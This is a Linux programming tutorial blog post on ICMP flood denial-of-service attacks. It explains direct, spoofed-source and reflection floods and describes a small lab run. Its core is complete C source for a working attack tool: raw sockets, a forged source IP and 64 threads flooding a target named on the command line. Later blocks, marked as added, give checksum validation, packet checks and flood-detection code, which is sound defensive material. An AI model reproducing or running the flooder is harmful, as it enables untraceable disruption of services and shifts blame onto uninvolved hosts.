Linux Programming: ICMP Flood Attacks
<p>In my previous article, "Implementing ping in Linux", I used the ICMP protocol to implement a ping program. Beyond ping, what other little-known or interesting uses does ICMP have? Here I introduce another well-known ICMP trick: the ICMP flood attack.</p>
<p>The ICMP flood is one form of the well-known DoS (denial of service) attack, a technique favoured by attackers. With the aim of deepening my own understanding of ICMP, I will also try to write a small ICMP flood program on top of it.</p>
<p>A flood attack uses network techniques to send a large volume of useless packets to a target host, so that the target is kept busy processing them and can no longer provide its normal service.</p>
<p>ICMP flood: as the name says, a flood of ping packets is sent to the target host, which is then so busy handling pings that it cannot serve other legitimate requests, as if it had been drowned under a flood of pings.</p>
<p>Implementing an ICMP flood calls for three pieces of background:</p>
<ul>
<li>how DoS attacks work</li>
<li>a thorough understanding of ICMP</li>
<li>raw socket programming</li>
</ul>
<p><strong>I. How the ICMP flood works</strong></p>
<p>The ICMP flood is built on ping, but a ping program rarely brings a target down, because ping sends far too slowly: the ping program I implemented limits itself to one packet per second, a rate the target handles with plenty of room to spare. To produce a "flood", the sending rate has to go up. Here are three ways of mounting an ICMP flood:</p>
<p>(1) Direct flood</p>
<p>This is a contest between the local host's bandwidth and the target's: if my host has a 30M link and yours only 3M, my flood stands a good chance of swamping your host. The attacking host's processing power and bandwidth must exceed the victim's, otherwise the attacker ends up DoSing itself. On this basis, a high-bandwidth, high-performance machine can use multiple threads to send many ICMP echo requests at once, so that the target slows down or even crashes under the load. The big drawback is that the victim can block the source by the source IP address in the ICMP packets, and the attack cannot continue.</p>
<p>(2) Spoofed-IP flood</p>
<p>Building on the direct flood, we disguise the sender's IP address as another one. Spoofing a random IP hides the attacker's location well; spoofing another victim's IP sets two hosts against each other: victim 1's ICMP replies flood victim 2, and when victim 1's administrator checks the source address to see who is attacking, it turns out to be host 2, which becomes the scapegoat.</p>
<p>(3) Reflection attack</p>
<p>This attack follows a different idea from the two above and is more ingeniously designed. It is really a combination and upgrade of the first two, a strategy rather like "killing with a borrowed knife": instead of hitting the target directly, the attacker makes a group of other hosts believe the target is sending them ICMP echo requests, so they all send echo replies to the target, and the flood arrives from every direction. For example, send echo requests to the other hosts on the LAN with the source address spoofed to the target's IP, and the target becomes the focus of all the echo replies. The attack is very hard to trace, because the victim can hardly tell who the attack source is.</p>
<p>
<img title="Linux编程之ICMP洪水攻击" alt="Linux编程之ICMP洪水攻击" src="https://zhuji.jb51.net/uploads/img/202305/b415f6745b5a0cd927f20c5ae4deb731.jpg"></p>
<p><strong>II. Designing the ICMP flood program</strong></p>
<p>Here I want to implement an ICMP flood example using method (2). Method (3), "killing with a borrowed knife", is more ingenious, but it is only a further extension of method (2)'s spoofing and is implemented in much the same way.</p>
<p>First, the attack model:</p>
<p>
<img title="Linux编程之ICMP洪水攻击" alt="Linux编程之ICMP洪水攻击" src="https://zhuji.jb51.net/uploads/img/202305/6582fa199d47711486f7651251bf3a9b.jpg"></p>
<p><span><strong>1. Building the ICMP packet</strong></span></p>
<p>Building the packet differs little from the ping program. The one thing to watch is that we must fill in the IP header ourselves, because we want to forge the source address and lay the blame on someone else.</p>
<pre><code class="language-c">// Headers and globals the article uses but never shows; names follow its ping program.
// thread_max_num is the 64 threads the text mentions, fake_ip the spoofed address from the experiment; icmp_packet_size is an assumed value.
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;signal.h&gt;
#include &lt;unistd.h&gt;
#include &lt;pthread.h&gt;
#include &lt;arpa/inet.h&gt;
#include &lt;netdb.h&gt;
#include &lt;netinet/ip.h&gt;
#include &lt;netinet/ip_icmp.h&gt;

#define proto_name        "icmp"
#define icmp_packet_size  (sizeof(struct ip) + sizeof(struct icmp))
#define thread_max_num    64
#define fake_ip           "172.0.5.182"
int rawsock;                    // raw socket shared by all sender threads
int proto_icmp;                 // protocol number from getprotobyname()
in_addr_t dest;                 // target address, network byte order
volatile sig_atomic_t alive;    // cleared by the SIGINT handler to end every sender loop

void dos_icmp_pack(char* packet)
{
    struct ip* ip_hdr = (struct ip*)packet;
    struct icmp* icmp_hdr = (struct icmp*)(packet + sizeof(struct ip));

    ip_hdr->ip_v = 4;
    ip_hdr->ip_hl = 5;
    ip_hdr->ip_tos = 0;
    ip_hdr->ip_len = htons(icmp_packet_size);
    ip_hdr->ip_id = htons(getpid());
    ip_hdr->ip_off = 0;
    ip_hdr->ip_ttl = 64;
    ip_hdr->ip_p = proto_icmp;
    ip_hdr->ip_sum = 0;                            // the kernel fills this in when IP_HDRINCL is set
    ip_hdr->ip_src.s_addr = inet_addr(fake_ip);    // spoofed source address
    ip_hdr->ip_dst.s_addr = dest;                  // address of the target host

    icmp_hdr->icmp_type = ICMP_ECHO;
    icmp_hdr->icmp_code = 0;
    icmp_hdr->icmp_cksum = htons(~(ICMP_ECHO &lt;&lt; 8));
    // note: because the data part is all zero, the checksum computation is simplified here
}
</code></pre>
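<p>The shortcut in the last two lines of <code>dos_icmp_pack()</code> is only right because the ICMP identifier, sequence number and data are all zero; a receiver cannot assume that, and the IP header checksum is left for the kernel. The block below is an added example, not code from the article: it implements the general RFC 1071 checksum, shows exactly where the shortcut stops agreeing with it, and performs the checks a receiver or network sensor should make on a raw IPv4/ICMP datagram (version, header length, total length against the captured length, protocol, both checksums) before trusting anything in it. It works on the wire layout directly, with offsets in the comments, so it needs no <code>netinet</code> structs; the function and type names are my own, the addresses 172.0.5.182 and 172.0.5.9 come from the article's experiment, and the identifier, sequence number and payload are constructed.</p>

```c
/* Added example, not code from the article: the general RFC 1071 checksum behind the
 * article's htons(~(ICMP_ECHO << 8)) shortcut, and the checks a receiver or sensor runs
 * on a raw IPv4/ICMP datagram before trusting it. Byte offsets follow the wire format.
 * 172.0.5.182 / 172.0.5.9 are the page's experiment addresses; id, seq, payload constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>

enum { IPV4_HDR_LEN = 20, ICMP_HDR_LEN = 8, ECHO_REQUEST = 8, ECHO_REPLY = 0, PROTO_ICMP = 1 };

/* RFC 1071 ones'-complement sum over len bytes, 16-bit words read big-endian.
 * Returns the checksum in host order; over a message that already carries its
 * checksum the result is 0. */
uint16_t inet_checksum(const uint8_t *p, size_t len)
{
    uint32_t sum = 0;
    for (; len > 1; len -= 2, p += 2)
        sum += ((uint32_t)p[0] << 8) | p[1];
    if (len == 1)
        sum += (uint32_t)p[0] << 8;            /* odd trailing byte is zero-padded */
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);    /* fold carries back in */
    return (uint16_t)~sum;
}

static void put16(uint8_t *p, uint16_t v) { p[0] = v >> 8; p[1] = v & 0xff; }
static uint16_t get16(const uint8_t *p) { return (uint16_t)(p[0] << 8 | p[1]); }

/* 1 if the article's shortcut equals the real checksum of a data-less echo request
 * with this id/seq; that holds only when both are zero. */
int shortcut_matches(uint16_t id, uint16_t seq)
{
    uint8_t hdr[ICMP_HDR_LEN] = { ECHO_REQUEST, 0, 0, 0 };
    put16(hdr + 4, id); put16(hdr + 6, seq);
    uint16_t shortcut = (uint16_t)~(ECHO_REQUEST << 8);   /* 0xF7FF */
    return inet_checksum(hdr, sizeof hdr) == shortcut;
}

/* Same IPv4 + ICMP echo layout the article's dos_icmp_pack() writes, with both
 * checksums computed properly. Returns the datagram length, 0 if buf is too small. */
size_t build_echo_packet(uint8_t *buf, size_t buflen, const char *src, const char *dst,
                         uint16_t id, uint16_t seq, const uint8_t *data, size_t dlen)
{
    size_t total = IPV4_HDR_LEN + ICMP_HDR_LEN + dlen;
    if (buflen < total || total > 0xffff) return 0;
    memset(buf, 0, total);
    buf[0] = 0x45;                                        /* version 4, header length 5 words */
    put16(buf + 2, (uint16_t)total);                      /* total length */
    buf[8] = 64;                                          /* TTL */
    buf[9] = PROTO_ICMP;                                  /* protocol */
    inet_pton(AF_INET, src, buf + 12);                    /* source (spoofed in the article) */
    inet_pton(AF_INET, dst, buf + 16);                    /* destination */
    put16(buf + 10, inet_checksum(buf, IPV4_HDR_LEN));    /* IP header checksum */
    uint8_t *ic = buf + IPV4_HDR_LEN;
    ic[0] = ECHO_REQUEST; ic[1] = 0;
    put16(ic + 4, id); put16(ic + 6, seq);
    memcpy(ic + ICMP_HDR_LEN, data, dlen);
    put16(ic + 2, inet_checksum(ic, ICMP_HDR_LEN + dlen)); /* ICMP checksum covers header + data */
    return total;
}

struct icmp_view { uint8_t src[4], dst[4], type, code; uint16_t id, seq; size_t data_len; };

/* 0 if pkt is a well-formed IPv4/ICMP datagram (and fills v), else a negative code
 * naming the first check that failed. */
int parse_ipv4_icmp(const uint8_t *pkt, size_t len, struct icmp_view *v)
{
    if (len < IPV4_HDR_LEN) return -1;                          /* truncated IP header */
    size_t ihl = (pkt[0] & 0x0f) * 4, total = get16(pkt + 2);
    if ((pkt[0] >> 4) != 4 || ihl < IPV4_HDR_LEN || ihl > len) return -2;
    if (total < ihl + ICMP_HDR_LEN || total > len) return -3;   /* length field vs capture */
    if (pkt[9] != PROTO_ICMP) return -4;
    if (inet_checksum(pkt, ihl) != 0) return -5;                /* bad IP header checksum */
    if (inet_checksum(pkt + ihl, total - ihl) != 0) return -6;  /* bad ICMP checksum */
    const uint8_t *ic = pkt + ihl;
    memcpy(v->src, pkt + 12, 4); memcpy(v->dst, pkt + 16, 4);
    v->type = ic[0]; v->code = ic[1];
    v->id = get16(ic + 4); v->seq = get16(ic + 6);
    v->data_len = total - ihl - ICMP_HDR_LEN;
    return 0;
}

/* Builds the page's experiment packet (spoofed 172.0.5.182 -> 172.0.5.9) and parses it
 * back; corrupt != 0 flips one payload bit first. Returns the parse code. */
int check_constructed_packet(int corrupt)
{
    uint8_t buf[64];
    struct icmp_view v;
    size_t n = build_echo_packet(buf, sizeof buf, "172.0.5.182", "172.0.5.9",
                                 0x1234, 1, (const uint8_t *)"abc", 3);
    if (n == 0) return -99;
    if (corrupt) buf[n - 1] ^= 0x01;
    return parse_ipv4_icmp(buf, n, &v);
}

int main(void)
{
    printf("shortcut valid for id=0,seq=0: %d; for id=0x1234,seq=1: %d\n",
           shortcut_matches(0, 0), shortcut_matches(0x1234, 1));
    printf("constructed packet parses: %d; after corruption: %d\n",
           check_constructed_packet(0), check_constructed_packet(1));
    return 0;
}
```

<p>Compile with <code>gcc -o icmp_check icmp_check.c</code>; it opens no socket, so it needs no privileges. The verification property is the useful one for a sensor: summing a message together with the checksum it carries gives 0 only if nothing was altered, so a single call checks a captured packet.</p>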
<p><span><strong>2. The sending thread</strong></span></p>
<pre><code class="language-c">void* dos_attack(void* arg)    // pthread entry point: takes and returns void*
{
    char* packet = (char*)malloc(icmp_packet_size);
    struct sockaddr_in to;
    (void)arg;
    if(packet == NULL)
        return NULL;
    memset(packet, 0, icmp_packet_size);
    dos_icmp_pack(packet);

    to.sin_family = AF_INET;
    to.sin_addr.s_addr = dest;
    to.sin_port = htons(0);

    while(alive)    // global flag that controls sending
    {
        sendto(rawsock, packet, icmp_packet_size, 0, (struct sockaddr*)&amp;to, sizeof(struct sockaddr));
    }

    free(packet);    // remember to free the memory
    return NULL;
}
</code></pre>
<p><span><strong>3. The sending switch</strong></span></p>
<p>The switch is simple: a signal handler plus a global variable. When Ctrl+C is pressed, the attack stops.</p>
<pre><code class="language-c">void dos_sig(int signo)    // SIGINT handler; a handler receives the signal number
{
    (void)signo;
    alive = 0;    // every sender loop checks this flag and exits
    printf("stop dos attack!\n");
}
</code></pre>
<p><span><strong>4. Overall structure</strong></span></p>
<p>We use 64 threads sending together; the count could be raised a great deal to increase the intensity, but this is only an experiment and there is no need to go that far.</p>
<pre><code class="language-c">int main(int argc, char* argv[])
{
    struct hostent* host = NULL;
    struct protoent* protocol = NULL;
    int i;
    int created = 0;
    int on = 1;
    alive = 1;
    pthread_t attack_thread[thread_max_num];    // one handle per thread; 64 threads send at once
    int err = 0;

    if(argc &lt; 2)
    {
        printf("invalid input!\n");
        return -1;
    }

    signal(SIGINT, dos_sig);

    protocol = getprotobyname(proto_name);
    if(protocol == NULL)
    {
        printf("fail to getprotobyname!\n");
        return -1;
    }

    proto_icmp = protocol->p_proto;

    dest = inet_addr(argv[1]);

    if(dest == INADDR_NONE)
    {
        host = gethostbyname(argv[1]);
        if(host == NULL)
        {
            printf("invalid IP or domain name!\n");
            return -1;
        }
        memcpy((char*)&amp;dest, host->h_addr_list[0], host->h_length);
    }

    rawsock = socket(AF_INET, SOCK_RAW, proto_icmp);    // raw sockets need CAP_NET_RAW (root)
    if(rawsock &lt; 0)
    {
        printf("fail to create socket!\n");
        return -1;
    }

    // IP_HDRINCL takes an int flag; the original passed the string "1", which is not a valid option value
    setsockopt(rawsock, SOL_IP, IP_HDRINCL, &amp;on, sizeof(on));

    printf("ICMP flood attack start\n");

    for(i=0;i&lt;thread_max_num;i++)
    {
        err = pthread_create(&amp;attack_thread[created], NULL, (void*(*)(void*))dos_attack, NULL);
        if(err)
        {
            printf("fail to create thread %d, err %d\n", i, err);
        }
        else
        {
            created++;
        }
    }

    for(i=0;i&lt;created;i++)
    {
        pthread_join(attack_thread[i], NULL);    // wait for every sender thread to end
    }

    printf("ICMP attack finish!\n");

    close(rawsock);

    return 0;
}
</code></pre>
<p><strong>III. Experiment</strong></p>
<p>This experiment was done purely for learning, using my own equipment, to understand networking and protocol use a little better, so the attack was small and lasted only a few seconds, with no impact on any device.</p>
<p>The attack steps once more: host 172.0.5.183 is the attacking host, disguised as host 172.0.5.182, and it launches an ICMP flood against host 172.0.5.9.</p>
<p>Attack started:</p>
<p>
<img title="Linux编程之ICMP洪水攻击" alt="Linux编程之ICMP洪水攻击" src="https://zhuji.jb51.net/uploads/img/202305/38f845cbd83eab76cd8bb996ad1719e4.jpg"></p>
<p>Now the "victim" side. In just 5 seconds, more than 70,000 packets were correctly received and handed up to the upper layer. I did not dare do more, to avoid affecting the machine's work.</p>
<p>
<img title="Linux编程之ICMP洪水攻击" alt="Linux编程之ICMP洪水攻击" src="https://zhuji.jb51.net/uploads/img/202305/d680b4f31a7909c6ebc24369d6a39d9d.jpg"></p>
<p>A Wireshark capture shows nothing but ICMP packets, so the volume is clearly large. The packets' source address shows as 172.0.5.182 (our spoofed address), and the victim sent its echo replies back to 172.0.5.182. Host 172.0.5.182 must be wondering why on earth it is receiving so many echo replies.</p>
<p>
<img title="Linux编程之ICMP洪水攻击" alt="Linux编程之ICMP洪水攻击" id="theimg" src="https://zhuji.jb51.net/uploads/img/202305/04129861e73548d512de02802d4356c1.jpg"></p>
<p>That completes the attack experiment.</p>
<p>DDoS attacks are more common nowadays; they are more powerful, more cleverly designed and harder to defend against.<br>
In fact this DDoS attack is also launched on the basis of DoS; the steps are:</p>
<p>1. The attacker broadcasts echo request packets to an "amplifier network"<br>
2. The attacker sets the source IP of the broadcast packets to the host under attack<br>
3. The "amplifier network" sends echo replies to the host under attack<br>
4. A DDoS scenario results</p>
<p>The "amplifier network" here can be understood as a network with many hosts whose operating systems respond to certain ICMP request packets whose destination is a broadcast address.</p>
<p>The strategy is subtle: in short, the source address is forged as the IP of the host under attack and the packet is broadcast to all hosts; on receiving the echo request they all reply to that host, and it is attacked by the whole crowd.</p>
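<p>From the defender's side, the three floods in section I and the broadcast amplification above leave one of two traces on a host: a burst of inbound echo requests (the direct and spoofed-source floods), or a burst of echo replies that answer no request the host ever sent (what the scapegoat host 172.0.5.182 saw in the experiment, and what the target of a reflection or broadcast attack sees). The block below is an added example, not part of the article: it runs both checks over a constructed ICMP event log, using a sliding window for the request rate and a table of outstanding (identifier, sequence) pairs to tell solicited replies from backscatter. The event format, the thresholds and the 172.0.5.x addresses are assumptions made for the demonstration, not tuned recommendations.</p>

```c
/* Added example, not from the article: host-side detection of ICMP floods over a
 * constructed event log. Signal 1: inbound echo requests per sliding window (direct
 * and spoofed-source floods). Signal 2: echo replies matching no request this host
 * sent (what the scapegoat of the spoofed flood and the target of the reflection or
 * broadcast attack receive). Addresses reuse the page's 172.0.5.x lab; event format,
 * timings, counts and thresholds are assumptions made for the demonstration. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_EVENTS  1024
#define MAX_PENDING 64
enum { ECHO_REQUEST = 8, ECHO_REPLY = 0 };   /* ICMP type values */

struct icmp_event { uint32_t t_ms; const char *src, *dst; uint8_t type; uint16_t id, seq; };

struct flood_report {
    unsigned max_requests_in_window;   /* peak inbound echo requests seen in one window */
    unsigned matched_replies;          /* replies that answered a request this host sent */
    unsigned unsolicited_replies;      /* backscatter: replies to requests never sent */
    int request_flood, reply_flood;    /* threshold verdicts */
};

/* Events must be sorted by t_ms; host is the protected host's address. */
void analyse_icmp(const struct icmp_event *ev, size_t n, const char *host,
                  uint32_t window_ms, unsigned req_threshold, unsigned reply_threshold,
                  struct flood_report *r)
{
    static uint32_t req_t[MAX_EVENTS];           /* timestamps of inbound echo requests */
    uint32_t pending[MAX_PENDING];               /* id<<16|seq of our outstanding requests */
    size_t head = 0, tail = 0, npending = 0;
    memset(r, 0, sizeof *r);
    if (n > MAX_EVENTS) n = MAX_EVENTS;
    for (size_t i = 0; i < n; i++) {
        const struct icmp_event *e = &ev[i];
        uint32_t key = (uint32_t)e->id << 16 | e->seq;
        if (e->type == ECHO_REQUEST && strcmp(e->src, host) == 0) {
            if (npending < MAX_PENDING) pending[npending++] = key;   /* we sent a ping */
        } else if (e->type == ECHO_REQUEST && strcmp(e->dst, host) == 0) {
            req_t[tail++] = e->t_ms;
            while (head < tail && req_t[head] + window_ms <= e->t_ms) head++;  /* expire old ones */
            if (tail - head > r->max_requests_in_window) r->max_requests_in_window = tail - head;
        } else if (e->type == ECHO_REPLY && strcmp(e->dst, host) == 0) {
            size_t k = 0;
            while (k < npending && pending[k] != key) k++;
            if (k < npending) { pending[k] = pending[--npending]; r->matched_replies++; }
            else r->unsolicited_replies++;   /* its source is most likely a victim too, not the attacker */
        }
    }
    r->request_flood = r->max_requests_in_window >= req_threshold;
    r->reply_flood = r->unsolicited_replies >= reply_threshold;
}

/* Constructed log: three normal pings from the host with their replies, then a
 * 400-packet echo-request burst carrying a spoofed source, then 300 echo replies
 * from three "reflectors" answering requests the host never sent. */
size_t build_sample_log(struct icmp_event *out, size_t cap)
{
    const char *host = "172.0.5.9";
    const char *reflectors[] = { "172.0.5.20", "172.0.5.21", "172.0.5.22" };
    size_t n = 0;
    for (uint16_t s = 1; s <= 3 && n + 2 <= cap; s++) {
        out[n++] = (struct icmp_event){ (s - 1) * 1000u, host, "172.0.5.1", ECHO_REQUEST, 0x42, s };
        out[n++] = (struct icmp_event){ (s - 1) * 1000u + 5, "172.0.5.1", host, ECHO_REPLY, 0x42, s };
    }
    for (unsigned i = 0; i < 400 && n < cap; i++)        /* 2 requests per ms for 200 ms */
        out[n++] = (struct icmp_event){ 3000u + i / 2, "172.0.5.182", host, ECHO_REQUEST, 0, 0 };
    for (unsigned i = 0; i < 300 && n < cap; i++)        /* 1 unsolicited reply per ms */
        out[n++] = (struct icmp_event){ 5000u + i, reflectors[i % 3], host, ECHO_REPLY, 0x777, (uint16_t)i };
    return n;
}

/* Runs the detector over the sample log with assumed thresholds:
 * 200 requests per 1 s window, 100 unsolicited replies. */
struct flood_report run_demo(void)
{
    static struct icmp_event events[MAX_EVENTS];
    struct flood_report r;
    size_t n = build_sample_log(events, MAX_EVENTS);
    analyse_icmp(events, n, "172.0.5.9", 1000, 200, 100, &r);
    return r;
}

int main(void)
{
    struct flood_report r = run_demo();
    printf("peak inbound echo requests per window: %u (flood=%d)\n", r.max_requests_in_window, r.request_flood);
    printf("replies matched: %u, unsolicited: %u (flood=%d)\n", r.matched_replies, r.unsolicited_replies, r.reply_flood);
    return 0;
}
```

<p>The source address the detector sees in the spoofed and reflected cases belongs to another victim, which is why the remedy that works against the direct flood, blocking the source address, does not carry over. On a Linux host the usual mitigations are the kernel's own ICMP rate limiting (<code>net.ipv4.icmp_ratelimit</code>) and refusing to answer broadcast echo requests (<code>net.ipv4.icmp_echo_ignore_broadcasts</code>), which removes the host from any "amplifier network".</p>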
<p>That is all for this article; I hope it helps your learning, and please keep supporting us.</p>